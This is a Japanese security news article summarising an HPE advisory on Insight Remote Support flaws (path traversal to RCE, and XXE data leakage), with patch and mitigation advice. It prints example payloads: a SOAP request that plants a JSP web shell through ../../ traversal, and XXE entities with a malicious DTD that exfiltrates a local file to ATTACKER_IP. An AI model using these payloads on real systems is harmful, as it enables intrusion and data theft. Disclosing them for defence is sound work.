HPE IRS の脆弱性 CVE-2025-37097／37098／37099 が FIX：RCE や情報漏洩などの恐れ

Critical RCE Flaw Found in HPE Insight Remote Support Tool

2025/06/06 gbhackers — HPE (Hewlett-Packard Enterprise) が公開したセキュリティ・アドバイザリは、Insight Remote Support (IRS) ソフトウェアのバージョン 7.15.0.646 未満に存在する、複数の深刻な脆弱性に対処するものだ。これらの脆弱性は、外部の研究者によって発見され、HPE に報告されたものである。一連の脆弱性の悪用に成功したリモートの攻撃者は、影響を受けるシステム上における、任意のコード実行／ディレクトリ・トラバーサル／機密情報の漏洩などを引き起こす可能性を得る。

脆弱性の技術的詳細

これらの脆弱性は、CVE-2025-37097／CVE-2025-37098／CVE-2025-37099 として追跡されており、CVSS スコアは 6.5〜9.8 (深刻度：High〜Critical) と評価されている。

主な攻撃ベクターの技術的な概要は、以下のとおりである：

• ディレクトリ・トラバーサルとリモート・コード実行 (RCE) ：
  • IRS サービスのファイル・アップロード・メカニズムにおける DataPackageReceiverWebSvcHelperFails 内の processAtatchmentDataStream メソッドが、attachmentName パラメーターを適切に検証しない。それにより、攻撃者はディレクトリ・トラバーサル・シーケンス (例：../../) を使用して、到達できないはずのディレクトリ外へのファイルを書込みを可能にする。そして、Tomcat の webapps/ROOT/ などの実行可能パスに、悪意の Web シェルを配置する可能性を手にする。
  • 悪用例となる SOAP ペイロード：xml<web:DataPackageSubmissionRequest> <web:attachments> <web:ArrayOfAttachment> <web:Attachment> <web:FileName>../../webapps/ROOT/shell.jsp</web:FileName> <web:FileContent>{base64-encoded-malicious-jsp}</web:FileContent> </web:Attachment> </web:ArrayOfAttachment> </web:attachments> </web:DataPackageSubmissionRequest>
  • 脆弱なコード・スニペット：javaString attachmentFileLocation = attachmentFileDirectory + File.separatorChar + attachmentName; File file = new File(attachmentFileLocation); file.createNewFile(); // Writes attacker-controlled content to arbitrary paths
  • この脆弱性が悪用されると、IRS サービスの権限でリモート・コード実行が生じる恐れがある。
    .
• XML 外部エンティティ (XXE) 注入と情報漏えい：
  • HPE の ucacore ライブラリにある validateAgainstXSD メソッドは、デバイス登録時の XML 入力を処理する際に、十分なドキュメント・タイプ定義 (DTD：Document Type Definition) 制限を設定していない。したがって攻撃者は、SOAP リクエストに悪意の XML エンティティを注入し、サーバが管理するローカル・ファイルの内容や環境変数を、攻撃者が制御するホストへと、HTTP リクエスト経由で漏洩させる可能性を手にする。
  • XXE ペイロードの例：xml<tns:identifiers> <![CDATA[<!DOCTYPE a SYSTEM "http://ATTACKER_IP/malicious.dtd"> <a>&callhome;</a>]]> </tns:identifiers>
  • ファイル内容を漏洩させる悪意の DTD：xml<!ENTITY % file SYSTEM "file:///C:/users/Administrator/Desktop/hello.txt"> <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://ATTACKER_IP/?content=%file;'>"> %eval; %exfiltrate;
  • この攻撃をディレクトリ・トラバーサル脆弱性と組み合わせることで、認証トークンを盗み、特権を昇格させることも可能となる。

緩和策と推奨事項

すでに HPE は、 IRS バージョン 7.15.0.646 をリリースし、これらの脆弱性に対処している。

• XML バリデータでの DTD 処理の無効化
• ファイル・パスに対する厳格な入力サニタイズの実装
• 機密性の高いワークフローへの認証チェックの追加

管理者への推奨策

• [管理者設定 > ソフトウェア更新] から、IRS を v7.15.0.646 以降にアップグレードする。
• 自動更新を有効化し、パッチを適時に適用する。
• エンドポイントから /DeviceRegistration および /DataPackageReceiver への、不審な SOAP リクエストを監査ログで監視する。
• ツールが内部専用で利用されている場合には、IRS エンドポイントへの外部アクセスを制限する。

これらの脆弱性は、企業向けソフトウェアにおける確実な入力検証と安全な XML 解析の重要性を浮き彫りにしている。

HPE IRS のユーザー組織に推奨されるのは、直ちにパッチを適用し、潜在的な悪用／データ漏洩／リモート・システムの侵害などを防ぐことである。

進化する脅威から防御するために求められるのは、定期的な監視とセキュリティのベストプラクティスの遵守である。

技術的な詳細および PoC コードについては、公開アドバイザリおよび HPE の公式セキュリティ情報を参照してほしい。

HPE の Insight Remote Support (IRS) に３件の深刻な脆弱性が発見されました。サーバ／ストレージ／ネットワークの可用性を向上させるソリューションを提供し、エンタープライズ・インフラを支えるツールであるだけに、影響が懸念されそうです。ご利用のチームは、ご注意ください。よろしければ、HPE で検索も、ご参照ください。